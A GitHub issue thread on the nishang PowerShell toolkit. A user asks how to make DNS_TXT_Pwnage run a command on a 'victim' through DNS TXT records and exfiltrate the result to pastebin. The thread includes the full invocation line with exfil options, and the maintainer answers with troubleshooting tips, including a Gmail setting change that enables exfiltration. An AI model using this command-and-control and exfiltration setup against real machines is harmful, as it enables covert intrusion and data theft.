### ISSUE TITLE
Only want to execute a simple Get-Process command on the victim and exfil to pastebin

### ISSUE THREAD

**Issue by dimpol** [samratashok/nishang#38]
Hi, 
Amazing work on DNS_TXT_Pwnage !

**I only want to execute a Get-Service command and exfil that result to pastebin.**

Can you please tell me the correct command?

I have created a TXT record for start.mydomain.com with "begincommands"
I have created a TXT record for command.mydomain.com with "Get-Service"

I am importing the DNS_TXT_Pwnage.ps1 with Import-Module and then ....
DNS_TXT_Pwnage -StartDomain start.mydomain.com -cmdstring begincommands -CommandDomain command.mydomain.com -psstring startscript -PSDomain script.mydomain.com -Subdomains 2 -StopString stop -exfil -ExfilOption pastebin apikey username password.

The command get executed but i cannot exfil , also tried gmail.

Can you please help ?

**Comment by samratashok** [comment]
Just added a simple line to add verbosity to DNS_TXT_Pwnage. Run the above command with -Verbose parameter to check for errors. My guess, pastebin's spam detection is blocking your pastes or you have reached the free account limit for private pastes.

For gmail, you need to enable "Allow access to insecure apps" in gmail account settings before you can use it.
